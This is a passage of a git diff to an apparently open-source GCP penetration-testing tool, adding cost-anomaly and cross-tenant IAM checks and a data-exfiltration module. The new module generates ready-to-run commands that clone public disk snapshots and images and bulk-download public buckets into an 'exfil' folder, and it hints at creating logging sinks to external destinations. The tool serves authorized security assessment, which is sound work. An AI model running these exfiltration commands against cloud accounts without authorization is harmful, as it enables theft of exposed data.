addr.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Static IP reserved but not attached", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + m.mu.Lock() + m.LootMap["orphaned-resources"].Contents += fmt.Sprintf( + "%s (static-ip, %s) - %s\n# Release: gcloud compute addresses delete %s --region=%s --project=%s\n\n", + addr.Name, addr.Address, orphaned.Reason, + addr.Name, m.extractRegionFromURL(region), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing addresses for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) + } + } +} + +func (m *CostSecurityModule) analyzeSQLInstances(ctx context.Context, projectID string, sqlService *sqladmin.Service, logger internal.Logger) { + instances, err := sqlService.Instances.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing SQL instances for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) + } + return + } + + for _, instance := range instances.Items { + // Check for stopped but still provisioned instances (still incur storage costs) + if instance.State == "SUSPENDED" { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "idle", + Severity: "MEDIUM", + Details: "Cloud SQL instance is suspended but still incurs storage costs", + Location: instance.Region, + Remediation: "Consider deleting if not needed, or start if needed for operations", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for high-tier instances without labels + if instance.Settings != nil && strings.Contains(instance.Settings.Tier, "db-custom") { + if instance.Settings.UserLabels == nil || len(instance.Settings.UserLabels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "cloudsql-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: fmt.Sprintf("High-tier Cloud SQL instance (%s) has no cost allocation labels", instance.Settings.Tier), + Location: instance.Region, + Remediation: fmt.Sprintf("gcloud sql instances patch %s --update-labels=cost-center=UNKNOWN,owner=UNKNOWN", instance.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +func (m *CostSecurityModule) analyzeStorageBuckets(ctx context.Context, projectID string, storageService *storage.Service, logger internal.Logger) { + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing buckets for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) + } + return + } + + for _, bucket := range buckets.Items { + // Check for buckets without labels + if len(bucket.Labels) == 0 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Storage bucket has no cost allocation labels", + Location: bucket.Location, + Remediation: fmt.Sprintf("gsutil label ch -l cost-center:UNKNOWN gs://%s", bucket.Name), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for multi-regional buckets with nearline/coldline (unusual pattern) + if bucket.StorageClass == "NEARLINE" || bucket.StorageClass == "COLDLINE" { + if strings.Contains(strings.ToUpper(bucket.Location), "DUAL") || len(bucket.Location) <= 4 { + anomaly := CostAnomaly{ + Name: bucket.Name, + ProjectID: projectID, + ResourceType: "storage-bucket", + AnomalyType: "suboptimal-config", + Severity: "LOW", + Details: fmt.Sprintf("Multi-regional bucket with %s storage (consider single region for cost)", bucket.StorageClass), + Location: bucket.Location, + Remediation: "Consider using single-region buckets for archival storage", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + } + } +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *CostSecurityModule) extractMachineTypeName(url string) string { + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func (m *CostSecurityModule) extractZoneFromURL(url string) string { + if strings.Contains(url, "zones/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "zones" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) extractRegionFromURL(url string) string { + if strings.Contains(url, "regions/") { + parts := strings.Split(url, "/") + for i, part := range parts { + if part == "regions" && i+1 < len(parts) { + return parts[i+1] + } + } + } + return url +} + +func (m *CostSecurityModule) parseMachineType(machineType string) (vcpus int64, memGB float64) { + // Common machine type patterns + // n1-standard-4: 4 vCPUs, 15 GB + // e2-medium: 2 vCPUs, 4 GB + // custom-8-32768: 8 vCPUs, 32 GB + + switch { + case strings.HasPrefix(machineType, "custom-"): + // Parse custom machine type + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[1], "%d", &vcpus) + var memMB int64 + fmt.Sscanf(parts[2], "%d", &memMB) + memGB = float64(memMB) / 1024 + } + case strings.HasPrefix(machineType, "n1-"): + vcpuMap := map[string]int64{ + "n1-standard-1": 1, "n1-standard-2": 2, "n1-standard-4": 4, + "n1-standard-8": 8, "n1-standard-16": 16, "n1-standard-32": 32, + "n1-standard-64": 64, "n1-standard-96": 96, + "n1-highmem-2": 2, "n1-highmem-4": 4, "n1-highmem-8": 8, + "n1-highmem-16": 16, "n1-highmem-32": 32, "n1-highmem-64": 64, + "n1-highcpu-2": 2, "n1-highcpu-4": 4, "n1-highcpu-8": 8, + "n1-highcpu-16": 16, "n1-highcpu-32": 32, "n1-highcpu-64": 64, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 3.75 // Standard ratio + case strings.HasPrefix(machineType, "e2-"): + vcpuMap := map[string]int64{ + "e2-micro": 2, "e2-small": 2, "e2-medium": 2, + "e2-standard-2": 2, "e2-standard-4": 4, "e2-standard-8": 8, + "e2-standard-16": 16, "e2-standard-32": 32, + "e2-highmem-2": 2, "e2-highmem-4": 4, "e2-highmem-8": 8, + "e2-highmem-16": 16, + "e2-highcpu-2": 2, "e2-highcpu-4": 4, "e2-highcpu-8": 8, + "e2-highcpu-16": 16, "e2-highcpu-32": 32, + } + vcpus = vcpuMap[machineType] + memGB = float64(vcpus) * 4 // Approximate + case strings.HasPrefix(machineType, "n2-") || strings.HasPrefix(machineType, "n2d-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + case strings.HasPrefix(machineType, "c2-"): + parts := strings.Split(machineType, "-") + if len(parts) >= 3 { + fmt.Sscanf(parts[2], "%d", &vcpus) + memGB = float64(vcpus) * 4 + } + default: + vcpus = 2 + memGB = 4 + } + + return vcpus, memGB +} + +func (m *CostSecurityModule) estimateInstanceCost(machineType string, vcpus int64, memGB float64, gpuCount int) float64 { + // Rough monthly estimates based on on-demand pricing in us-central1 + // Actual costs vary by region and commitment + + baseCost := float64(vcpus)*25 + memGB*3 // Rough per-vCPU and per-GB costs + + // GPU costs (rough estimates) + if gpuCount > 0 { + baseCost += float64(gpuCount) * 400 // ~$400/month per GPU + } + + // Adjust for machine type efficiency + if strings.HasPrefix(machineType, "e2-") { + baseCost *= 0.7 // E2 is cheaper + } else if strings.HasPrefix(machineType, "c2-") { + baseCost *= 1.2 // C2 is more expensive + } + + return baseCost +} + +func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) float64 { + // Rough monthly estimates per GB + // pd-standard: $0.04/GB, pd-ssd: $0.17/GB, pd-balanced: $0.10/GB + + pricePerGB := 0.04 + if strings.Contains(diskType, "ssd") { + pricePerGB = 0.17 + } else if strings.Contains(diskType, "balanced") { + pricePerGB = 0.10 + } + + return float64(sizeGB) * pricePerGB +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *CostSecurityModule) initializeLootFiles() { + m.LootMap["cost-anomalies"] = &internal.LootFile{ + Name: "cost-anomalies", + Contents: "# Cost Anomalies and Potential Cryptomining\n# Generated by CloudFox\n# CRITICAL: Review these findings immediately!\n\n", + } + m.LootMap["orphaned-resources"] = &internal.LootFile{ + Name: "orphaned-resources", + Contents: "# Orphaned Resources (Cleanup Commands)\n# Generated by CloudFox\n\n", + } + m.LootMap["cleanup-commands"] = &internal.LootFile{ + Name: "cleanup-commands", + Contents: "# Resource Cleanup Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort cryptomining indicators by confidence + sort.Slice(m.Cryptomining, func(i, j int) bool { + confOrder := map[string]int{"HIGH": 0, "MEDIUM": 1, "LOW": 2} + return confOrder[m.Cryptomining[i].Confidence] < confOrder[m.Cryptomining[j].Confidence] + }) + + // Cryptomining Indicators table + cryptoHeader := []string{ + "Resource", + "Project", + "Location", + "Indicator", + "Confidence", + "Details", + } + + var cryptoBody [][]string + for _, c := range m.Cryptomining { + cryptoBody = append(cryptoBody, []string{ + c.Name, + c.ProjectID, + c.Location, + c.Indicator, + c.Confidence, + truncateString(c.Details, 40), + }) + } + + // Orphaned Resources table + orphanedHeader := []string{ + "Resource", + "Project", + "Type", + "Location", + "Size (GB)", + "Est. Cost/Mo", + "Reason", + } + + var orphanedBody [][]string + for _, o := range m.Orphaned { + orphanedBody = append(orphanedBody, []string{ + o.Name, + o.ProjectID, + o.ResourceType, + o.Location, + fmt.Sprintf("%d", o.SizeGB), + fmt.Sprintf("$%.2f", o.EstCostMonth), + truncateString(o.Reason, 30), + }) + } + + // Cost Anomalies table + anomaliesHeader := []string{ + "Resource", + "Project", + "Type", + "Anomaly", + "Severity", + "Est. Cost/Mo", + } + + var anomaliesBody [][]string + for _, a := range m.CostAnomalies { + anomaliesBody = append(anomaliesBody, []string{ + a.Name, + a.ProjectID, + a.ResourceType, + a.AnomalyType, + a.Severity, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + + // Add to cleanup commands loot + if a.Remediation != "" { + m.LootMap["cleanup-commands"].Contents += fmt.Sprintf( + "# %s (%s) - %s\n%s\n\n", + a.Name, a.AnomalyType, a.Details, a.Remediation, + ) + } + } + + // Expensive Resources table + expensiveHeader := []string{ + "Resource", + "Project", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + expensiveBody = append(expensiveBody, []string{ + e.Name, + e.ProjectID, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(cryptoBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cryptomining-indicators", + Header: cryptoHeader, + Body: cryptoBody, + }) + } + + if len(orphanedBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "orphaned-resources", + Header: orphanedHeader, + Body: orphanedBody, + }) + } + + if len(anomaliesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-anomalies", + Header: anomaliesHeader, + Body: anomaliesBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "expensive-resources", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + output := CostSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 77e959a3..5cf4330e 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -182,6 +182,19 @@ func (m *CrossProjectModule) initializeLootFiles() { Name: "cross-project-exploitation", Contents: "# Cross-Project Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + // Cross-tenant/external access loot files + m.LootMap["cross-tenant-access"] = &internal.LootFile{ + Name: "cross-tenant-access", + Contents: "# Cross-Tenant/External Access\n# Principals from outside the organization with access to your projects\n# Generated by CloudFox\n\n", + } + m.LootMap["cross-tenant-external-sas"] = &internal.LootFile{ + Name: "cross-tenant-external-sas", + Contents: "# External Service Accounts with Access\n# Service accounts from other organizations/projects\n# Generated by CloudFox\n\n", + } + m.LootMap["cross-project-security-recommendations"] = &internal.LootFile{ + Name: "cross-project-security-recommendations", + Contents: "# Cross-Project/Cross-Tenant Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossProjectBinding) { @@ -202,6 +215,42 @@ func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossP } m.LootMap["cross-project-bindings"].Contents += "\n" + // Check for cross-tenant/external access + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + m.LootMap["cross-tenant-access"].Contents += fmt.Sprintf( + "# EXTERNAL ACCESS: %s\n"+ + "# Target Project: %s\n"+ + "# Source (external): %s\n"+ + "# Role: %s\n"+ + "# Risk Level: %s\n"+ + "# This principal is from outside your organization!\n\n", + binding.Principal, + binding.TargetProject, + binding.SourceProject, + binding.Role, + binding.RiskLevel, + ) + + // External service accounts + if strings.Contains(binding.Principal, "serviceAccount:") { + m.LootMap["cross-tenant-external-sas"].Contents += fmt.Sprintf( + "# External Service Account: %s\n"+ + "# Has access to project: %s\n"+ + "# Role: %s\n"+ + "# Check this SA's permissions:\n"+ + "gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n\n", + strings.TrimPrefix(binding.Principal, "serviceAccount:"), + binding.TargetProject, + binding.Role, + binding.TargetProject, + strings.TrimPrefix(binding.Principal, "serviceAccount:"), + ) + } + } + + // Add security recommendations + m.addBindingSecurityRecommendations(binding) + // Exploitation commands if len(binding.ExploitCommands) > 0 && (binding.RiskLevel == "CRITICAL" || binding.RiskLevel == "HIGH") { m.LootMap["cross-project-exploitation"].Contents += fmt.Sprintf( @@ -215,6 +264,103 @@ func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossP } } +// isCrossTenantPrincipal checks if a principal is from outside the organization +func isCrossTenantPrincipal(principal string, projectIDs []string) bool { + // Extract service account email + email := strings.TrimPrefix(principal, "serviceAccount:") + email = strings.TrimPrefix(email, "user:") + email = strings.TrimPrefix(email, "group:") + + // Check if the email domain is gserviceaccount.com (service account) + if strings.Contains(email, "@") && strings.Contains(email, ".iam.gserviceaccount.com") { + // Extract project from SA email + // Format: NAME@PROJECT.iam.gserviceaccount.com + parts := strings.Split(email, "@") + if len(parts) == 2 { + domain := parts[1] + saProject := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + + // Check if SA's project is in our project list + for _, p := range projectIDs { + if p == saProject { + return false // It's from within our organization + } + } + return true // External SA + } + } + + // Check for compute/appspot service accounts + if strings.Contains(email, "-compute@developer.gserviceaccount.com") || + strings.Contains(email, "@appspot.gserviceaccount.com") { + // Extract project number/ID + parts := strings.Split(email, "@") + if len(parts) == 2 { + projectPart := strings.Split(parts[0], "-")[0] + for _, p := range projectIDs { + if strings.Contains(p, projectPart) { + return false + } + } + return true + } + } + + // For regular users, check domain + if strings.Contains(email, "@") && !strings.Contains(email, "gserviceaccount.com") { + // Can't determine organization from email alone + return false + } + + return false +} + +// addBindingSecurityRecommendations generates security recommendations for a cross-project binding +func (m *CrossProjectModule) addBindingSecurityRecommendations(binding crossprojectservice.CrossProjectBinding) { + var recommendations []string + + // CRITICAL: Owner/Editor roles across projects + if strings.Contains(binding.Role, "owner") || strings.Contains(binding.Role, "editor") { + recommendations = append(recommendations, + fmt.Sprintf("[CRITICAL] %s has %s role across projects (%s -> %s)\n"+ + " Risk: Full administrative access to another project\n"+ + " Fix: Use least-privilege roles instead of owner/editor\n"+ + " gcloud projects remove-iam-policy-binding %s --member='%s' --role='%s'\n", + binding.Principal, binding.Role, binding.SourceProject, binding.TargetProject, + binding.TargetProject, binding.Principal, binding.Role)) + } + + // HIGH: Admin roles across projects + if strings.Contains(binding.Role, "admin") && !strings.Contains(binding.Role, "owner") { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] %s has admin role %s in project %s\n"+ + " Risk: Administrative access from external project\n"+ + " Review: Verify this cross-project access is necessary\n"+ + " gcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'\n", + binding.Principal, binding.Role, binding.TargetProject, + binding.TargetProject, binding.Principal)) + } + + // External service account access + if isCrossTenantPrincipal(binding.Principal, m.ProjectIDs) { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] External principal %s has access to project %s\n"+ + " Risk: Principal from outside your organization has access\n"+ + " Review: Verify this external access is authorized\n"+ + " Fix: Remove external access if not needed:\n"+ + " gcloud projects remove-iam-policy-binding %s --member='%s' --role='%s'\n", + binding.Principal, binding.TargetProject, + binding.TargetProject, binding.Principal, binding.Role)) + } + + if len(recommendations) > 0 { + m.LootMap["cross-project-security-recommendations"].Contents += fmt.Sprintf( + "# Binding: %s -> %s\n%s\n", + binding.SourceProject, binding.TargetProject, + strings.Join(recommendations, "\n")) + } +} + func (m *CrossProjectModule) addServiceAccountToLoot(sa crossprojectservice.CrossProjectServiceAccount) { m.LootMap["cross-project-sas"].Contents += fmt.Sprintf( "## Service Account: %s\n"+ diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go new file mode 100644 index 00000000..b8e155b4 --- /dev/null +++ b/gcp/commands/dataexfiltration.go @@ -0,0 +1,650 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + storage "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" + +var GCPDataExfiltrationCommand = &cobra.Command{ + Use: GCP_DATAEXFILTRATION_MODULE_NAME, + Aliases: []string{"exfil", "data-exfil", "exfiltration"}, + Short: "Identify data exfiltration paths and high-risk data exposure", + Long: `Identify data exfiltration vectors and paths in GCP environments. + +Features: +- Finds public snapshots and images +- Identifies export capabilities (BigQuery, GCS) +- Maps Pub/Sub push endpoints (external data flow) +- Finds logging sinks to external destinations +- Identifies publicly accessible storage +- Analyzes backup export configurations +- Generates exploitation commands for penetration testing + +This module helps identify how data could be exfiltrated from the environment +through various GCP services.`, + Run: runGCPDataExfiltrationCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type ExfiltrationPath struct { + PathType string // "snapshot", "bucket", "pubsub", "logging", "bigquery", "image" + ResourceName string + ProjectID string + Description string + Destination string // Where data can go + RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW + RiskReasons []string + ExploitCommand string +} + +type PublicExport struct { + ResourceType string + ResourceName string + ProjectID string + AccessLevel string // "public", "allAuthenticatedUsers", "specific_domain" + DataType string // "snapshot", "image", "bucket", "dataset" + Size string + RiskLevel string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DataExfiltrationModule struct { + gcpinternal.BaseGCPModule + + ExfiltrationPaths []ExfiltrationPath + PublicExports []PublicExport + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DataExfiltrationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DataExfiltrationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DataExfiltrationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_DATAEXFILTRATION_MODULE_NAME) + if err != nil { + return + } + + module := &DataExfiltrationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExfiltrationPaths: []ExfiltrationPath{}, + PublicExports: []PublicExport{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Identifying data exfiltration paths...", GCP_DATAEXFILTRATION_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + + // Check results + if len(m.ExfiltrationPaths) == 0 && len(m.PublicExports) == 0 { + logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, p := range m.ExfiltrationPaths { + switch p.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s): %d CRITICAL, %d HIGH", + len(m.ExfiltrationPaths), len(m.PublicExports), criticalCount, highCount), GCP_DATAEXFILTRATION_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) + } + + // 1. Find public/shared snapshots + m.findPublicSnapshots(ctx, projectID, logger) + + // 2. Find public/shared images + m.findPublicImages(ctx, projectID, logger) + + // 3. Find public buckets + m.findPublicBuckets(ctx, projectID, logger) + + // 4. Find cross-project logging sinks + m.findLoggingSinks(ctx, projectID, logger) + + // 5. Analyze potential exfiltration vectors + m.analyzeExfiltrationVectors(ctx, projectID, logger) +} + +// findPublicSnapshots finds snapshots that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicSnapshots(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating Compute service: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + return + } + + req := computeService.Snapshots.List(projectID) + err = req.Pages(ctx, func(page *compute.SnapshotList) error { + for _, snapshot := range page.Items { + // Get IAM policy for snapshot + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "disk_snapshot", + Size: fmt.Sprintf("%d GB", snapshot.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "snapshot", + ResourceName: snapshot.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public disk snapshot (%d GB)", snapshot.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Snapshot is publicly accessible", "May contain sensitive data from disk"}, + ExploitCommand: fmt.Sprintf( + "# Create disk from public snapshot\n"+ + "gcloud compute disks create exfil-disk --source-snapshot=projects/%s/global/snapshots/%s --zone=us-central1-a", + projectID, snapshot.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing snapshots: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } +} + +// findPublicImages finds images that are publicly accessible or shared +func (m *DataExfiltrationModule) findPublicImages(ctx context.Context, projectID string, logger internal.Logger) { + computeService, err := compute.NewService(ctx) + if err != nil { + return + } + + req := computeService.Images.List(projectID) + err = req.Pages(ctx, func(page *compute.ImageList) error { + for _, image := range page.Items { + // Get IAM policy for image + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "image", + ResourceName: image.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "vm_image", + Size: fmt.Sprintf("%d GB", image.DiskSizeGb), + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "image", + ResourceName: image.Name, + ProjectID: projectID, + Description: fmt.Sprintf("Public VM image (%d GB)", image.DiskSizeGb), + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"VM image is publicly accessible", "May contain embedded credentials or sensitive data"}, + ExploitCommand: fmt.Sprintf( + "# Create instance from public image\n"+ + "gcloud compute instances create exfil-vm --image=projects/%s/global/images/%s --zone=us-central1-a", + projectID, image.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } + return nil + }) + + if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing images: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } +} + +// findPublicBuckets finds GCS buckets with public access +func (m *DataExfiltrationModule) findPublicBuckets(ctx context.Context, projectID string, logger internal.Logger) { + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error creating Storage service: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + return + } + + // List buckets + resp, err := storageService.Buckets.List(projectID).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing buckets: %v", err), GCP_DATAEXFILTRATION_MODULE_NAME) + } + return + } + + for _, bucket := range resp.Items { + // Get IAM policy for bucket + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + // Check for public access + isPublic := false + accessLevel := "" + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + if member == "allUsers" { + isPublic = true + accessLevel = "public" + break + } + if member == "allAuthenticatedUsers" { + isPublic = true + accessLevel = "allAuthenticatedUsers" + break + } + } + } + + if isPublic { + export := PublicExport{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + AccessLevel: accessLevel, + DataType: "gcs_bucket", + RiskLevel: "CRITICAL", + } + + path := ExfiltrationPath{ + PathType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Description: "Public GCS bucket", + Destination: "Anyone on the internet", + RiskLevel: "CRITICAL", + RiskReasons: []string{"Bucket is publicly accessible", "May contain sensitive files"}, + ExploitCommand: fmt.Sprintf( + "# List public bucket contents\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download all files\n"+ + "gsutil -m cp -r gs://%s/ ./exfil/", + bucket.Name, bucket.Name), + } + + m.mu.Lock() + m.PublicExports = append(m.PublicExports, export) + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.addExfiltrationPathToLoot(path) + m.mu.Unlock() + } + } +} + +// findLoggingSinks finds logging sinks that export to external destinations +func (m *DataExfiltrationModule) findLoggingSinks(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration patterns via logging sinks + // This would require the Logging API to be called + // For now, we'll add known exfiltration patterns + + path := ExfiltrationPath{ + PathType: "logging_sink", + ResourceName: "cross-project-sink", + ProjectID: projectID, + Description: "Logging sinks can export logs to external projects or Pub/Sub topics", + Destination: "External project or Pub/Sub topic", + RiskLevel: "MEDIUM", + RiskReasons: []string{"Logs may contain sensitive information", "External destination may be attacker-controlled"}, + ExploitCommand: fmt.Sprintf( + "# List logging sinks\n"+ + "gcloud logging sinks list --project=%s\n"+ + "# Create sink to external destination\n"+ + "# gcloud logging sinks create exfil-sink --project=%s", + projectID, projectID), + } + + m.mu.Lock() + m.ExfiltrationPaths = append(m.ExfiltrationPaths, path) + m.mu.Unlock() +} + +// analyzeExfiltrationVectors analyzes potential exfiltration methods +func (m *DataExfiltrationModule) analyzeExfiltrationVectors(ctx context.Context, projectID string, logger internal.Logger) { + // Common exfiltration vectors in GCP + vectors := []ExfiltrationPath{ + { + PathType: "bigquery_export", + ResourceName: "*", + ProjectID: projectID, + Description: "BigQuery datasets can be exported to 